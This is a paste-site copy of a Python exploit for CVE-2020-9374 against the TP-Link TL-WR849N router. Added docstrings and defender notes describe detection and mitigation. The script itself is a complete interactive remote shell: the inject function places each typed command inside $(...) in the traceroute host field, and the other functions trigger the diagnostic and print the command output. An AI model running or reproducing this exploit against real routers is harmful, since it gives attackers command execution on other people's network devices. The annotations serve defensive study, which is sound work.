FlyFar

TP LINK TL-WR849N - Remote Code Execution - CVE-2020-9374

Feb 14th, 2024
  1. # Exploit Title: TP LINK TL-WR849N - Remote Code Execution
  2. # Date: 2019-11-20
  3. # Exploit Author: Elber Tavares
  4. # Vendor Homepage: https://www.tp-link.com/
  5. # Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
  6. # Version: TL-WR849N 0.9.1 4.16
  7. # Tested on: linux, windows
  8. # CVE : CVE-2020-9374
  9.  
  10. import requests
  11.  
  def output(headers,cookies):
      """Read back the router's traceroute diagnostic result and print it.

      Sends a single POST to the hard-coded address http://192.168.0.1/cgi?1
      whose body names the TRACEROUTE_DIAG section and three of its fields
      (diagnosticsState, X_TP_HopSeq, X_TP_Result), then removes the known
      field labels from the reply text and prints the remainder.

      Args:
          headers: HTTP headers, passed unchanged to requests.post().
          cookies: cookies, passed unchanged to requests.post().

      Returns:
          None. The filtered reply is written to stdout.

      Defender note: the stripped string ': Name or service not known' is a
      name-resolution error. Presumably the device echoes the `host` value it
      failed to resolve inside X_TP_Result, which is how this script gets
      text back -- inferred from the filtering below, not shown on this page.
      An X_TP_Result that holds anything other than hop data or a hostname is
      therefore worth alerting on.
      """
      url = 'http://192.168.0.1/cgi?1'
      # Request body: one CRLF-terminated line per item, section header first.
      data = ''
      data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
      data += 'diagnosticsState\x0d\x0a'
      data += 'X_TP_HopSeq\x0d\x0a'
      data += 'X_TP_Result\x0d\x0a'
      r = requests.post(url,data=data,headers=headers,cookies=cookies)
      saida = r.text
      # Strip the fixed labels one at a time so only the echoed value remains.
      filtro = saida.replace(': Name or service not known','')
      filtro = filtro.replace('[0,0,0,0,0,0]0','')
      filtro = filtro.replace('diagnosticsState=','')
      filtro = filtro.replace('X_TP_HopSeq=0','')
      filtro = filtro.replace('X_TP_Result=','')
      # Drops the last 8 characters of the reply; presumably a fixed trailer
      # sent by the device -- TODO confirm against a captured response.
      print(filtro[:-8])
  27.  
  def aceppt(headers,cookies):
      """POST the ACT_OP_TRACERT action to /cgi?7, then print the result.

      The name is presumably a misspelling of "accept"; it is kept because
      inject() calls it by this name.

      Args:
          headers: HTTP headers, passed unchanged to requests.post().
          cookies: cookies, passed unchanged to requests.post().

      Returns:
          None. Output is produced by the output() call at the end.

      Defender note: judging by the action name, this looks like the request
      that makes the router run the traceroute configured by the previous
      call -- confirm against the firmware. In device or proxy logs the
      sequence is a POST to /cgi?2, then /cgi?7, then /cgi?1 from one client.
      """
      url = 'http://192.168.0.1/cgi?7'
      data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
      # The response is assigned but never inspected (no status check).
      r = requests.post(url,data=data,headers=headers,cookies=cookies)
      output(headers,cookies)
  33.    
  def inject(command,headers,cookies):
      """Write traceroute settings to /cgi?2 with `command` inside the host field.

      This is the request that carries the CVE-2020-9374 payload: the `host`
      parameter of the TRACEROUTE_DIAG section is set to the caller's string
      wrapped in shell command substitution, `"$(...)"`. The header of this
      file lists TL-WR849N firmware 0.9.1 4.16 as the affected version.

      Args:
          command: text placed verbatim between `$(` and `)` in the host value.
          headers: HTTP headers, passed unchanged to requests.post().
          cookies: cookies, passed unchanged to requests.post().

      Returns:
          None. Calls aceppt(), which triggers the action and prints the reply.

      Defender notes:
          * Root cause, as far as this page shows: the device appears to pass
            the `host` value to a shell without validation. A hostname/IP
            allowlist on that field is the fix on the firmware side.
          * Detection: POSTs to /cgi?2 with Content-Type text/plain whose
            `host=` line is not a plain hostname or IP address (here it
            contains `$(`).
          * Mitigation for operators: install the vendor's current firmware
            for this model, keep the management interface off the WAN, and
            replace default admin credentials, since the script sends a
            credential with every request.
      """
      url = 'http://192.168.0.1/cgi?2'
      # Request body: section header followed by CRLF-terminated key=value lines.
      data = ''
      data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
      data += 'maxHopCount=20\x0d\x0a'
      data += 'timeout=5\x0d\x0a'
      data += 'numberOfTries=1\x0d\x0a'
      # Vulnerable parameter: caller-supplied text is concatenated in unescaped.
      data += 'host="$('+command+')"\x0d\x0a'
      data += 'dataBlockSize=64\x0d\x0a'
      data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
      data += 'diagnosticsState=Requested\x0d\x0a'
      data += 'X_TP_HopSeq=0\x0d\x0a'
      # The response is assigned but never inspected (no status check).
      r = requests.post(url,data=data,headers=headers,cookies=cookies)
      aceppt(headers,cookies)
  48.  
  def main():
      """Prompt for input in an endless loop and hand each line to inject().

      Builds the cookie and header set shared by every request and then reads
      from stdin forever; the loop has no exit condition of its own.

      Defender notes:
          * The credential is sent as a cookie named `Authorization` with a
            `Basic ...` value, not as an Authorization header, so log and IDS
            rules should look at the Cookie header.
          * REPLACEBASE64AUTH is a placeholder. As written, every request
            carries an admin credential; whether the device would accept the
            same requests without one cannot be told from this page.
          * The Referer is pinned to the router's own mainFrame.htm,
            presumably because the web interface checks it -- TODO confirm.
      """
      cookies = {“Authorization”: “Basic REPLACEBASE64AUTH”}
      headers = {'Content-Type': 'text/plain',
      'Referer': 'http://192.168.0.1/mainFrame.htm'}
      while True:
          command = input('$ ')
          inject(command,headers,cookies)
  56.  
  # Called unconditionally: there is no `if __name__ == "__main__":` guard, so
  # importing this module also starts the prompt loop and its network requests.
  main()